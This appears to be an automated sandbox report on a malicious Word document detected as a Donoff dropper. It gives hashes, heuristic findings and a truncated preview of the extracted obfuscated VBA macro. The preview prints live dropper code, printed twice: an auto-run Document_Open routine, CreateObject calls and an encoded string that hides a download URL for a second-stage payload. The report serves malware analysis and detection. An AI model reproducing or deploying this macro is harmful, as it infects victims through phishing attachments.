Office (OLE) malware analysis — malicious · fe2ee78c0911e078

MALICIOUS

Office (OLE)

103.5 KB Created: 2016-05-31 22:12:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: b98030e81c12fce6d23429ade75a9116 SHA-1: 512779d9994384dc7757c740228e79ccd8b0fffd SHA-256: fe2ee78c0911e07841154e1047874d0d4e7a2fc2b04d3a0bf2f028f8fd9a69a4

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing VBA macros, specifically a Document_Open macro that uses CreateObject and CallByName. ClamAV identifies it as Doc.Dropper.Donoff-5743527-0, indicating its role as a dropper. The macros are obfuscated, but their execution upon opening suggests an intent to download and execute a secondary payload, consistent with a spearphishing attachment.

Heuristics 7

ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19495 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19495 bytes
SHA-256: `2b78a084257aaf15e846525f044ac4f91aa9c8495dd7417a6fb276c28251d3b4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub ifJXunD(ByVal vnRMVBn As String, ByVal sFQePLjlbp As Integer) SjlVPRSoNHEhIj True, "dniXBe93oJq69lyJFGxXDi725GZ61", 9044 yfvnpmjXEp "jegj4qYr8GzcSSIn1", "iNDPH1ogoqUB7e19dZNJMvae5" MxurIozKYICVx atpSJi = 6741 If uJdwteswsFlvP("VudD5DneYfDJohe0lDe", 886, 440) Then DntGocsIYoJ = 9024 jqwBAjKXdHAQQh AWGrXigELHiL 1883 XyVQwXWexoU = 3192 VmhvSufwHEL "V599DMVDMgmhQOWa1u" kDkRYAGMHeC = "NlVR7p5fbD8HJoOaObYw29aQj" Else cTUOeKxOsBEQlr 653, 5024, 4694 hUDIMtmnHEWL "dJLWg7gCH7jTPKuGlq", 9258 vOtsHcmlTQY SKzrJAUA = False End If End Sub Private Sub tmQpKmMUafHoVH(ByVal VkEZrvMkQ As Integer) IMNwjRbn "rIRV6v2EZva4wF7iRXEzxoLfnf", "1mbMepoJyHggtQmZKdh", "0pkGtSllxsQdVtdFVU8r0KO" IVnAzml = 358 wEAMgjOFext xvHFyahe = "t4tVfMnikcyNTRtpjHgtDpcuvAHC7rFTc" If tZtBkDWpD(True, 55, True) Then RLGbW = 4069 YzXHqxBGV 555, "O7nKk4PzcseeoFvEOcwgMlczLIh", 2131 WTFJl = "20COHFFdaYTYFCfsVTwkbMjW" oAGzpQxkQlu Else IWQOyviNx lFwpzAPo 9355 AKnVdeAnoU = "YvHv3FkO0Hdm5ZsbGwrgJF2h4h0q" End If End Sub Private Sub Document_Open() Dim LVsDNG As Integer Dim iizOpIhwRmqGft As Boolean sYWovTRZNF.TztBCSQaheqP End Sub Attribute VB_Name = "sYWovTRZNF" Private Sub SuVSmzR(ByVal pJRyCuyjdWXoIU As String, ByVal VCanofljwCKBc As String) guSQZPbKX "bzWnE3hmuoe1y6tTzXkQIljkNgFkQUw" GLHeDaKyQv = "TyHUet1bAPFHbUUttjU" tDkvX "ginN65AqwazSKedw63068U1jrirZcH", "r2LFEOhf0iZL3cfURcnzsfgrlQizA", True End Sub Private Sub fTdIdJYGMT(ByVal YYEMQOshgHI As Integer, ByVal sXQbQYaCJTcmY As String) CrCYKye 3110 Rvojdv = 6371 GnnopWKUCYRxY "2gl19rDwVlfJ2mTENDAcTmBgvu86", "VI8lDAbgMTKilPaSRxD4AI" xXNHxMZcbkRe = True hOrUKS End Sub Private Sub VjjaybzauQDzlm(ByVal groepiPdnOAuMk As String, ByVal puvpgnUdlKPkk As Boolean) IoqtSbtCpAmNF clfDwUbZfs pQhBQ End Sub Public Function YwYtrtprwCDQsg(ByVal LQbKYxPKsa As String, ByVal TtjoxjJORcJG As String) As Object Dim QzmZsfPbTn As Integer Dim VznxgqNsDDz As String Set YwYtrtprwCDQsg = bUPbCraVebf(CreateObject(LQbKYxPKsa)) End Function Public Sub TztBCSQaheqP() Dim yUhAXjTEf As String Dim qHUKrx As Integer On Error GoTo ToUKmZAJNAt NOzhVYSKZw.skBiHCeeIZX NOzhVYSKZw.YyTnc ZTrrvzw Exit Sub ToUKmZAJNAt: End Sub Private Sub dnbHjXJPuzhO(ByVal KxKvShcOQmXAjL As String) QxEuSmzVVTz = "LfrqvkJtMvD1E39EwTl" If dhUvN Then KXzDoezrpS False, "oKoczUbNhCaaYxYIO8VoU9" YLCORc xnuVoOW True Else kWxiXCrYc 2123 End If EurWCkpWBfWk "FvpEOMjXDhoYu09BTe", 972 End Sub Private Function bUPbCraVebf(ByVal uXFWQRn As Object) As Object Dim gKiDlG As Integer Set bUPbCraVebf = uXFWQRn End Function Private Sub sXVGk(ByVal alpOiOwMi As String, ByVal tNTDKnrdGelP As String, ByVal XOjkfcgdyitR As String) Set vMtlclzSCsiJsE = KvkmuLDE.OxyKsTkjBaVTSu(True, XOjkfcgdyitR) KvkmuLDE.umhTeWro bxgfX, 2670, "vZpNK090S2GwBNFCoX", vMtlclzSCsiJsE XHMBiQe.liSzxfbT RZAUxiRskOzK.IAdhBUDEG(HPVgcGMVt, vMtlclzSCsiJsE, 8879), False, "XVrzKbqe96sFIcuWx6kv9Jirve", alpOiOwMi End Sub Private Sub ZTrrvzw() Dim gVFEi As Boolean sXVGk XHMBiQe.XhJCxyXDgkn, "3sPa09mpytAPOr28YYWznjbAfCfgJYYsy", GEBpU XHMBiQe.KJutEUtH False, 618, XHMBiQe.XhJCxyXDgkn End Sub Private Function bxgfX() As String bxgfX = oJBeNrdIKYxh.rfwmsZECzoa("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z") End Function Private Function HPVgcGMVt() As String HPVgcGMVt = oJBeNrdIKYxh.rfwmsZECzoa("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0") End Function Private Function GEBpU() As String GEBpU = oJBeNrdIKYxh.rfwmsZECzoa("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv") End Function Attribute VB_Name = "oJBeNrdIKYxh" Private Function blcVueROOd(ByVal aggCLpCXwsqY As Integer, ByVal AUPMbDkE As Integer, ByVal huZFpyrjQgu As String, ByVal VTIsg As String) As String If Not ulwzWkVqEYW ... (truncated)

SHA-256: 2b78a084257aaf15e846525f044ac4f91aa9c8495dd7417a6fb276c28251d3b4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub ifJXunD(ByVal vnRMVBn As String, ByVal sFQePLjlbp As Integer)
SjlVPRSoNHEhIj True, "dniXBe93oJq69lyJFGxXDi725GZ61", 9044
yfvnpmjXEp "jegj4qYr8GzcSSIn1", "iNDPH1ogoqUB7e19dZNJMvae5"
MxurIozKYICVx
atpSJi = 6741
If uJdwteswsFlvP("VudD5DneYfDJohe0lDe", 886, 440) Then
DntGocsIYoJ = 9024
jqwBAjKXdHAQQh
AWGrXigELHiL 1883
XyVQwXWexoU = 3192
VmhvSufwHEL "V599DMVDMgmhQOWa1u"
kDkRYAGMHeC = "NlVR7p5fbD8HJoOaObYw29aQj"
Else
cTUOeKxOsBEQlr 653, 5024, 4694
hUDIMtmnHEWL "dJLWg7gCH7jTPKuGlq", 9258
vOtsHcmlTQY
SKzrJAUA = False
End If
End Sub
Private Sub tmQpKmMUafHoVH(ByVal VkEZrvMkQ As Integer)
IMNwjRbn "rIRV6v2EZva4wF7iRXEzxoLfnf", "1mbMepoJyHggtQmZKdh", "0pkGtSllxsQdVtdFVU8r0KO"
IVnAzml = 358
wEAMgjOFext
xvHFyahe = "t4tVfMnikcyNTRtpjHgtDpcuvAHC7rFTc"
If tZtBkDWpD(True, 55, True) Then
RLGbW = 4069
YzXHqxBGV 555, "O7nKk4PzcseeoFvEOcwgMlczLIh", 2131
WTFJl = "20COHFFdaYTYFCfsVTwkbMjW"
oAGzpQxkQlu
Else
IWQOyviNx
lFwpzAPo 9355
AKnVdeAnoU = "YvHv3FkO0Hdm5ZsbGwrgJF2h4h0q"
End If
End Sub
Private Sub Document_Open()
Dim LVsDNG As Integer
Dim iizOpIhwRmqGft As Boolean
sYWovTRZNF.TztBCSQaheqP
End Sub

Attribute VB_Name = "sYWovTRZNF"
Private Sub SuVSmzR(ByVal pJRyCuyjdWXoIU As String, ByVal VCanofljwCKBc As String)
guSQZPbKX "bzWnE3hmuoe1y6tTzXkQIljkNgFkQUw"
GLHeDaKyQv = "TyHUet1bAPFHbUUttjU"
tDkvX "ginN65AqwazSKedw63068U1jrirZcH", "r2LFEOhf0iZL3cfURcnzsfgrlQizA", True
End Sub
Private Sub fTdIdJYGMT(ByVal YYEMQOshgHI As Integer, ByVal sXQbQYaCJTcmY As String)
CrCYKye 3110
Rvojdv = 6371
GnnopWKUCYRxY "2gl19rDwVlfJ2mTENDAcTmBgvu86", "VI8lDAbgMTKilPaSRxD4AI"
xXNHxMZcbkRe = True
hOrUKS
End Sub
Private Sub VjjaybzauQDzlm(ByVal groepiPdnOAuMk As String, ByVal puvpgnUdlKPkk As Boolean)
IoqtSbtCpAmNF
clfDwUbZfs
pQhBQ
End Sub
Public Function YwYtrtprwCDQsg(ByVal LQbKYxPKsa As String, ByVal TtjoxjJORcJG As String) As Object
Dim QzmZsfPbTn As Integer
Dim VznxgqNsDDz As String
Set YwYtrtprwCDQsg = bUPbCraVebf(CreateObject(LQbKYxPKsa))
End Function
Public Sub TztBCSQaheqP()
Dim yUhAXjTEf As String
Dim qHUKrx As Integer
On Error GoTo ToUKmZAJNAt
NOzhVYSKZw.skBiHCeeIZX
NOzhVYSKZw.YyTnc
ZTrrvzw
Exit Sub
ToUKmZAJNAt:
End Sub
Private Sub dnbHjXJPuzhO(ByVal KxKvShcOQmXAjL As String)
QxEuSmzVVTz = "LfrqvkJtMvD1E39EwTl"
If dhUvN Then
KXzDoezrpS False, "oKoczUbNhCaaYxYIO8VoU9"
YLCORc
xnuVoOW True
Else
kWxiXCrYc 2123
End If
EurWCkpWBfWk "FvpEOMjXDhoYu09BTe", 972
End Sub
Private Function bUPbCraVebf(ByVal uXFWQRn As Object) As Object
Dim gKiDlG As Integer
Set bUPbCraVebf = uXFWQRn
End Function
Private Sub sXVGk(ByVal alpOiOwMi As String, ByVal tNTDKnrdGelP As String, ByVal XOjkfcgdyitR As String)
Set vMtlclzSCsiJsE = KvkmuLDE.OxyKsTkjBaVTSu(True, XOjkfcgdyitR)
KvkmuLDE.umhTeWro bxgfX, 2670, "vZpNK090S2GwBNFCoX", vMtlclzSCsiJsE
XHMBiQe.liSzxfbT RZAUxiRskOzK.IAdhBUDEG(HPVgcGMVt, vMtlclzSCsiJsE, 8879), False, "XVrzKbqe96sFIcuWx6kv9Jirve", alpOiOwMi
End Sub
Private Sub ZTrrvzw()
Dim gVFEi As Boolean
sXVGk XHMBiQe.XhJCxyXDgkn, "3sPa09mpytAPOr28YYWznjbAfCfgJYYsy", GEBpU
XHMBiQe.KJutEUtH False, 618, XHMBiQe.XhJCxyXDgkn
End Sub
Private Function bxgfX() As String
bxgfX = oJBeNrdIKYxh.rfwmsZECzoa("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function HPVgcGMVt() As String
HPVgcGMVt = oJBeNrdIKYxh.rfwmsZECzoa("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function GEBpU() As String
GEBpU = oJBeNrdIKYxh.rfwmsZECzoa("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "oJBeNrdIKYxh"
Private Function blcVueROOd(ByVal aggCLpCXwsqY As Integer, ByVal AUPMbDkE As Integer, ByVal huZFpyrjQgu As String, ByVal VTIsg As String) As String
If Not ulwzWkVqEYW
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.